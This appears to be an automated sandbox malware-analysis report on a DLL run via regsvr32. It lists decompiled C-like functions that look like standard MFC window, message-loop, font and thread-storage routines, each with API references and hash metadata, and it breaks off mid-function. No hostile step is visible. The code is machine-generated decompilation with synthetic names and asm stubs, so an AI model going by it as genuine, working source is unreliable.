                                                                                                            				_t60 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t140 =  *((intOrPtr*)(_t143 + 0xb0));
                                                                                                            				 *((intOrPtr*)(_t143 + 0xa4)) = _t60;
                                                                                                            				_t109 = __ecx;
                                                                                                            				_t62 = GetWindowRect( *(_t140 + 0x1c), _t143 - 0x80);
                                                                                                            				if( *((intOrPtr*)(_t140 + 0x88)) != _t109 ||  *(_t143 + 0xb4) != 0 && EqualRect(_t143 - 0x80,  *(_t143 + 0xb4)) == 0) {
                                                                                                            					if( *((intOrPtr*)(_t109 + 0x90)) != 0 && ( *(_t140 + 0x80) & 0x00000040) != 0) {
                                                                                                            						 *(_t109 + 0x7c) =  *(_t109 + 0x7c) | 0x00000040;
                                                                                                            					}
                                                                                                            					 *(_t109 + 0x7c) =  *(_t109 + 0x7c) & 0xfffffff9;
                                                                                                            					_t65 =  *(_t140 + 0x7c) & 0x00000006 |  *(_t109 + 0x7c);
                                                                                                            					 *(_t109 + 0x7c) = _t65;
                                                                                                            					if((_t65 & 0x00000040) == 0) {
                                                                                                            						_push(0x104);
                                                                                                            						_push(_t143 - 0x60);
                                                                                                            						E1002095F(_t140);
                                                                                                            						E10029B23(_t140,  *((intOrPtr*)(_t109 + 0x1c)), _t143 - 0x60);
                                                                                                            					}
                                                                                                            					_t70 = ( *(_t140 + 0x7c) ^  *(_t109 + 0x7c)) & 0x0000f000 ^  *(_t140 + 0x7c) | 0x00000f00;
                                                                                                            					if( *((intOrPtr*)(_t109 + 0x90)) == 0) {
                                                                                                            						_t71 = _t70 & 0xfffffffe;
                                                                                                            					} else {
                                                                                                            						_t71 = _t70 | 0x00000001;
                                                                                                            					}
                                                                                                            					E100383D0(_t140, _t71);
                                                                                                            					_push(0xffffffff);
                                                                                                            					_t135 = E1002CDCE(_t109, GetDlgCtrlID( *(_t140 + 0x1c)) & 0x0000ffff);
                                                                                                            					if(_t135 > 0) {
                                                                                                            						 *((intOrPtr*)(E100086F2(_t109 + 0x94, _t135))) = _t140;
                                                                                                            					}
                                                                                                            					if( *(_t143 + 0xb4) == 0) {
                                                                                                            						if(_t135 < 1) {
                                                                                                            							_t137 = _t109 + 0x94;
                                                                                                            							E1001E2BE(_t109 + 0x94, _t143,  *((intOrPtr*)(_t109 + 0x9c)), _t140);
                                                                                                            							E1001E2BE(_t137, _t143,  *((intOrPtr*)(_t137 + 8)), 0);
                                                                                                            						}
                                                                                                            						_t115 =  *0x1004efa4; // 0x2
                                                                                                            						_push(0x115);
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push( ~_t115);
                                                                                                            						_t117 =  *0x1004efa0; // 0x2
                                                                                                            						_push( ~_t117);
                                                                                                            						_push(0);
                                                                                                            					} else {
                                                                                                            						CopyRect(_t143 - 0x70,  *(_t143 + 0xb4));
                                                                                                            						E10028E5A(_t109, _t143 - 0x70);
                                                                                                            						if(_t135 < 1) {
                                                                                                            							asm("cdq");
                                                                                                            							asm("cdq");
                                                                                                            							_push(( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)) - _t133 >> 1) +  *((intOrPtr*)(_t143 - 0x6c)));
                                                                                                            							_push(( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70) - _t133 >> 1) +  *(_t143 - 0x70));
                                                                                                            							_push( *((intOrPtr*)(_t143 + 0xb0)));
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							E1002CE2A(_t109);
                                                                                                            							_t140 =  *((intOrPtr*)(_t143 + 0xb0));
                                                                                                            						}
                                                                                                            						_push(0x114);
                                                                                                            						_push( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)));
                                                                                                            						_push( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70));
                                                                                                            						_push( *((intOrPtr*)(_t143 - 0x6c)));
                                                                                                            						_push( *(_t143 - 0x70));
                                                                                                            						_push(0);
                                                                                                            					}
                                                                                                            					E100204FE(_t140);
                                                                                                            					if(E100220EE(_t143, GetParent( *(_t140 + 0x1c))) != _t109) {
                                                                                                            						E1000870E(_t140, _t109);
                                                                                                            					}
                                                                                                            					_t120 =  *((intOrPtr*)(_t140 + 0x88));
                                                                                                            					if( *((intOrPtr*)(_t140 + 0x88)) != 0) {
                                                                                                            						E1002D1B2(_t120, _t140, 0xffffffff, 0);
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t140 + 0x88)) = _t109;
                                                                                                            					 *(E100314D8(_t109) + 0xcc) =  *(_t62 + 0xcc) | 0x0000000c;
                                                                                                            				}
                                                                                                            				return E100117AE(_t62,  *((intOrPtr*)(_t143 + 0xa4)));
                                                                                                            			}


















                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$CopyCtrlEqualParentWindow
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2544134605-2766056989
                                                                                                            • Opcode ID: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                                                            • Instruction ID: b45b6ef3e14a7e4d87b63386d5d067ae84193d18a4a25c559dd4ceadf4ed8576
                                                                                                            • Opcode Fuzzy Hash: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                                                            • Instruction Fuzzy Hash: E651BA716006499FDF25DF68DC95BAE77AAFF44300F504529E91ADB1A2CB30AD05CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10021B92(intOrPtr* __ecx, signed int _a4) {
                                                                                                            				struct HWND__* _v4;
                                                                                                            				struct tagMSG* _v8;
                                                                                                            				int _v12;
                                                                                                            				int _v16;
                                                                                                            				struct HWND__* _t42;
                                                                                                            				signed int _t45;
                                                                                                            				int _t53;
                                                                                                            				long _t56;
                                                                                                            				int _t62;
                                                                                                            				intOrPtr* _t69;
                                                                                                            
                                                                                                            				_t62 = 1;
                                                                                                            				_t69 = __ecx;
                                                                                                            				_v12 = 1;
                                                                                                            				_v16 = 0;
                                                                                                            				if((_a4 & 0x00000004) == 0 || (E100202AB(__ecx) & 0x10000000) != 0) {
                                                                                                            					_t62 = 0;
                                                                                                            				}
                                                                                                            				_t42 = GetParent( *(_t69 + 0x1c));
                                                                                                            				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
                                                                                                            				_v4 = _t42;
                                                                                                            				_v8 = E1001F7B7();
                                                                                                            				L14:
                                                                                                            				while(1) {
                                                                                                            					L14:
                                                                                                            					while(_v12 != 0) {
                                                                                                            						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                            							while(1) {
                                                                                                            								L15:
                                                                                                            								_t45 = E1001FABB();
                                                                                                            								if(_t45 == 0) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								if(_t62 != 0) {
                                                                                                            									_t53 = _v8->message;
                                                                                                            									if(_t53 == 0x118 || _t53 == 0x104) {
                                                                                                            										E100203AD(_t69, 1);
                                                                                                            										UpdateWindow( *(_t69 + 0x1c));
                                                                                                            										_t62 = 0;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
                                                                                                            									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
                                                                                                            									return  *((intOrPtr*)(_t69 + 0x40));
                                                                                                            								} else {
                                                                                                            									if(E1001FA27(_v8) != 0) {
                                                                                                            										_v12 = 1;
                                                                                                            										_v16 = 0;
                                                                                                            									}
                                                                                                            									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                            										continue;
                                                                                                            									} else {
                                                                                                            										goto L14;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_push(0);
                                                                                                            							E1003A098();
                                                                                                            							return _t45 | 0xffffffff;
                                                                                                            						}
                                                                                                            						if(_t62 != 0) {
                                                                                                            							E100203AD(_t69, 1);
                                                                                                            							UpdateWindow( *(_t69 + 0x1c));
                                                                                                            							_t62 = 0;
                                                                                                            						}
                                                                                                            						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
                                                                                                            							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
                                                                                                            						}
                                                                                                            						if((_a4 & 0x00000002) != 0) {
                                                                                                            							L13:
                                                                                                            							_v12 = 0;
                                                                                                            							continue;
                                                                                                            						} else {
                                                                                                            							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
                                                                                                            							_v16 = _v16 + 1;
                                                                                                            							if(_t56 != 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L15;
                                                                                                            				}
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10021BC0
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021BE7
                                                                                                            • UpdateWindow.USER32(?), ref: 10021C01
                                                                                                            • SendMessageA.USER32 ref: 10021C25
                                                                                                            • SendMessageA.USER32 ref: 10021C3F
                                                                                                            • UpdateWindow.USER32(?), ref: 10021C85
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021CB9
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                            • String ID:
                                                                                                            • API String ID: 2853195852-0
                                                                                                            • Opcode ID: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                                                            • Instruction ID: 572a0072a054787b928fb31f1bd515718dba8d5f307fe0ba771f0ec6dbe0ec5d
                                                                                                            • Opcode Fuzzy Hash: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                                                            • Instruction Fuzzy Hash: AC41D4382047419FD722CF22AC88E5BBAF5FFD1794FA0092DF881951A1D732E945CB52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E1000943B(void* __ecx) {
                                                                                                            				intOrPtr _t54;
                                                                                                            				intOrPtr _t56;
                                                                                                            				signed int _t72;
                                                                                                            				signed int _t74;
                                                                                                            				signed int _t79;
                                                                                                            				void* _t81;
                                                                                                            				void* _t85;
                                                                                                            				void* _t100;
                                                                                                            				void* _t101;
                                                                                                            				void* _t103;
                                                                                                            				signed int _t106;
                                                                                                            				intOrPtr* _t107;
                                                                                                            				void* _t109;
                                                                                                            				void* _t111;
                                                                                                            				void* _t112;
                                                                                                            
                                                                                                            				E10011BF0(0x1003add7, _t109);
                                                                                                            				_t112 = _t111 - 0x80;
                                                                                                            				_t54 =  *0x1004c470; // 0xf3933a06
                                                                                                            				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
                                                                                                            				_t101 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t109 - 0x58)) =  *0x1004b0a0(_t100, _t103, _t85);
                                                                                                            				 *((intOrPtr*)(_t109 - 0x50)) = 0;
                                                                                                            				 *((intOrPtr*)(_t109 - 0x54)) = 0x10040430;
                                                                                                            				_t56 =  *((intOrPtr*)(_t109 + 8));
                                                                                                            				 *(_t109 - 4) = 0;
                                                                                                            				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
                                                                                                            					if(E100090AB(_t109 - 0x54, 0x11) != 0 || E100090AB(_t109 - 0x54, 0xd) != 0) {
                                                                                                            						_t56 = _t109 - 0x54;
                                                                                                            						goto L6;
                                                                                                            					} else {
                                                                                                            						 *((intOrPtr*)(_t101 + 0x60)) = 0;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L6:
                                                                                                            					_t13 = _t56 + 4; // 0x10009a67
                                                                                                            					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
                                                                                                            					 *(_t109 - 0x78) = 0x20;
                                                                                                            					_t105 = lstrlenA(_t109 - 0x30) + 1;
                                                                                                            					E10010B20(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
                                                                                                            					 *((intOrPtr*)(_t109 - 0x74)) = E100067FA(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
                                                                                                            					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
                                                                                                            					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
                                                                                                            					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
                                                                                                            					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
                                                                                                            					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
                                                                                                            					_t72 =  *(_t109 - 0x4c);
                                                                                                            					__eflags = _t72;
                                                                                                            					_t106 = _t72;
                                                                                                            					if(_t72 < 0) {
                                                                                                            						_t106 =  ~_t72;
                                                                                                            					}
                                                                                                            					E10029194(_t109 - 0x8c);
                                                                                                            					 *(_t109 - 4) = 1;
                                                                                                            					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
                                                                                                            					asm("cdq");
                                                                                                            					_t107 = _t101 + 0x60;
                                                                                                            					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
                                                                                                            					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
                                                                                                            					E1003881B(_t107);
                                                                                                            					_t79 = _t109 - 0x78;
                                                                                                            					__imp__#420(_t79, 0x10043168, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
                                                                                                            					__eflags = _t79;
                                                                                                            					if(__eflags < 0) {
                                                                                                            						 *_t107 = 0;
                                                                                                            					}
                                                                                                            					 *(_t109 - 4) = 0;
                                                                                                            					E100291EF(_t109 - 0x8c, __eflags);
                                                                                                            				}
                                                                                                            				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
                                                                                                            				 *((intOrPtr*)(_t109 - 0x54)) = 0x1003eb6c;
                                                                                                            				_t81 = E100293B4(_t109 - 0x54);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
                                                                                                            				return E100117AE(_t81,  *((intOrPtr*)(_t109 - 0x10)));
                                                                                                            			}



















                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10009440
                                                                                                            • GetObjectA.GDI32(10009A67,0000003C,?), ref: 100094AC
                                                                                                            • lstrlenA.KERNEL32(?), ref: 100094BD
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10009534
                                                                                                            • OleCreateFontIndirect.OLEAUT32(00000020,10043168,?), ref: 10009560
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4082312370-3916222277
                                                                                                            • Opcode ID: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                                                            • Instruction ID: 94df4567bccff522b7d7bd0d545f1ce16673c33dc0c382d35917ea97f1dbbf88
                                                                                                            • Opcode Fuzzy Hash: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                                                            • Instruction Fuzzy Hash: C641BA75D01259AFEB10CFE5C885ADDBBB4FF09344F50802AE856EB292E7349A04CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10037732(long* __ecx, signed int _a4, intOrPtr _a8) {
                                                                                                            				struct _CRITICAL_SECTION* _v8;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t32;
                                                                                                            				void* _t36;
                                                                                                            				void* _t37;
                                                                                                            				signed int _t52;
                                                                                                            				long* _t59;
                                                                                                            				struct _CRITICAL_SECTION* _t62;
                                                                                                            				void* _t64;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t59 = __ecx;
                                                                                                            				_t1 =  &(_t59[7]); // 0x1004f010
                                                                                                            				_t62 = _t1;
                                                                                                            				_v8 = _t62;
                                                                                                            				EnterCriticalSection(_t62);
                                                                                                            				_t32 = _a4;
                                                                                                            				if(_t32 <= 0) {
                                                                                                            					L20:
                                                                                                            					LeaveCriticalSection(_t62);
                                                                                                            				} else {
                                                                                                            					_t4 =  &(_t59[3]); // 0x3
                                                                                                            					if(_t32 >=  *_t4) {
                                                                                                            						goto L20;
                                                                                                            					} else {
                                                                                                            						_t64 = TlsGetValue( *_t59);
                                                                                                            						if(_t64 == 0) {
                                                                                                            							if(E1003741E(0x10) == 0) {
                                                                                                            								_t64 = 0;
                                                                                                            							} else {
                                                                                                            								_t64 = E10037684(_t34);
                                                                                                            							}
                                                                                                            							 *(_t64 + 8) = 0;
                                                                                                            							 *(_t64 + 0xc) = 0;
                                                                                                            							_t10 =  &(_t59[5]); // 0x6c09d8
                                                                                                            							_t49 =  *_t10;
                                                                                                            							_t11 =  &(_t59[6]); // 0x4
                                                                                                            							 *(_t64 +  *_t11) =  *_t10;
                                                                                                            							_t59[5] = _t64;
                                                                                                            							goto L10;
                                                                                                            						} else {
                                                                                                            							_t52 = _a4;
                                                                                                            							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
                                                                                                            								L10:
                                                                                                            								_t36 =  *(_t64 + 0xc);
                                                                                                            								if(_t36 != 0) {
                                                                                                            									_t16 =  &(_t59[3]); // 0x3
                                                                                                            									_t49 =  *_t16 << 2;
                                                                                                            									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
                                                                                                            								} else {
                                                                                                            									_t15 =  &(_t59[3]); // 0x3
                                                                                                            									_t37 = LocalAlloc(0,  *_t15 << 2);
                                                                                                            								}
                                                                                                            								if(_t37 == 0) {
                                                                                                            									LeaveCriticalSection(_v8);
                                                                                                            									_t37 = E1001CE3B(_t49);
                                                                                                            								}
                                                                                                            								 *(_t64 + 0xc) = _t37;
                                                                                                            								_t20 =  &(_t59[3]); // 0x3
                                                                                                            								E10011C50(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
                                                                                                            								_t23 =  &(_t59[3]); // 0x3
                                                                                                            								 *(_t64 + 8) =  *_t23;
                                                                                                            								TlsSetValue( *_t59, _t64);
                                                                                                            								_t52 = _a4;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t32 =  *(_t64 + 0xc);
                                                                                                            						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
                                                                                                            							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
                                                                                                            						}
                                                                                                            						LeaveCriticalSection(_v8);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t32;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F010,00000000,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037742
                                                                                                            • TlsGetValue.KERNEL32(1004EFF4,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037760
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD), ref: 100377BC
                                                                                                            • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4), ref: 100377CE
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 100377DB
                                                                                                            • TlsSetValue.KERNEL32(1004EFF4,00000000), ref: 1003780B
                                                                                                            • LeaveCriticalSection.KERNEL32(1004F010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 1003782C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                                                            • String ID:
                                                                                                            • API String ID: 784703316-0
                                                                                                            • Opcode ID: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                                                            • Instruction ID: 1d31c533a979c77301d76d8eb0d2db078f0d9c8120d6b2d843174624ed3e927a
                                                                                                            • Opcode Fuzzy Hash: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                                                            • Instruction Fuzzy Hash: F8317C75600615AFD726DF59C8C8C5ABBE5FF08352B11C929E81ADB611CB30FC50CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 79%
                                                                                                            			E1000F6EA(void* __ebx, void* __ecx) {
                                                                                                            				void* __ebp;
                                                                                                            				void* _t28;
                                                                                                            				void* _t36;
                                                                                                            				signed char _t37;
                                                                                                            				intOrPtr _t41;
                                                                                                            				void* _t42;
                                                                                                            				void* _t44;
                                                                                                            				intOrPtr _t45;
                                                                                                            				void* _t46;
                                                                                                            
                                                                                                            				_t39 = __ecx;
                                                                                                            				_t36 = __ebx;
                                                                                                            				_t41 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                            				if(_t41 == 0) {
                                                                                                            					_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                            					L14:
                                                                                                            					_t42 = E100220EE(_t45, GetTopWindow( *(_t45 + 0x1c)));
                                                                                                            					if(_t42 != 0) {
                                                                                                            						L7:
                                                                                                            						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
                                                                                                            							L18:
                                                                                                            							return _t42;
                                                                                                            						}
                                                                                                            						_push(_t36);
                                                                                                            						_t37 =  *(_t46 + 0x1c);
                                                                                                            						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
                                                                                                            							if((_t37 & 0x00000002) == 0) {
                                                                                                            								L16:
                                                                                                            								_push(_t37);
                                                                                                            								_push(0);
                                                                                                            								_push(_t42);
                                                                                                            								goto L17;
                                                                                                            							}
                                                                                                            							_t39 = _t42;
                                                                                                            							if(E100203CE(_t42) != 0) {
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							goto L12;
                                                                                                            						} else {
                                                                                                            							L12:
                                                                                                            							_push(_t37);
                                                                                                            							_push(_t42);
                                                                                                            							_push(_t45);
                                                                                                            							L17:
                                                                                                            							_t42 = E1000F6EA(_t37, _t39);
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t45;
                                                                                                            				}
                                                                                                            				_t28 = E100220EE(_t44, GetWindow( *(_t41 + 0x1c), 2));
                                                                                                            				_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                            				while(_t28 == 0) {
                                                                                                            					_t41 = E1000F695(_t45, E100220EE(_t45, GetParent( *(_t41 + 0x1c))));
                                                                                                            					if(_t41 == 0 || _t41 == _t45) {
                                                                                                            						goto L14;
                                                                                                            					} else {
                                                                                                            						_t28 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t42 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
                                                                                                            				goto L7;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParentVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 506644340-0
                                                                                                            • Opcode ID: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
                                                                                                            • Instruction ID: 9ff0abfdc9ec089c08616602c8c252ca1eec58daf7253e76d9435a222983167d
                                                                                                            • Opcode Fuzzy Hash: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
                                                                                                            • Instruction Fuzzy Hash: 2B21C1366087286FE732EEA19C49F2B769CEF406D0F02491CF845E7596C760EC01D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10024AA1(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				CHAR* _t21;
                                                                                                            				CHAR* _t22;
                                                                                                            				int _t31;
                                                                                                            				CHAR* _t33;
                                                                                                            				intOrPtr _t35;
                                                                                                            				CHAR* _t40;
                                                                                                            				void* _t44;
                                                                                                            				void* _t47;
                                                                                                            
                                                                                                            				_t40 = _a4;
                                                                                                            				_t31 = lstrlenA(_t40);
                                                                                                            				_t21 = E10038481(_t40, 0, 0) - 1;
                                                                                                            				_t44 = _t31 - _t21;
                                                                                                            				_t35 = _t44 + _t40;
                                                                                                            				_a4 = _t21;
                                                                                                            				_v8 = _t35;
                                                                                                            				if(_a8 < _t31) {
                                                                                                            					if(_a8 >= _t21) {
                                                                                                            						_t33 =  &(_t40[2]);
                                                                                                            						if( *_t40 == 0x5c && _t40[1] == 0x5c) {
                                                                                                            							while( *_t33 != 0x5c) {
                                                                                                            								_t33 = E100127D1(_t33);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if(_t44 > 3) {
                                                                                                            							do {
                                                                                                            								_t33 = E100127D1(_t33);
                                                                                                            							} while ( *_t33 != 0x5c);
                                                                                                            						}
                                                                                                            						_t22 = _a4;
                                                                                                            						_t47 = _t33 - _t40;
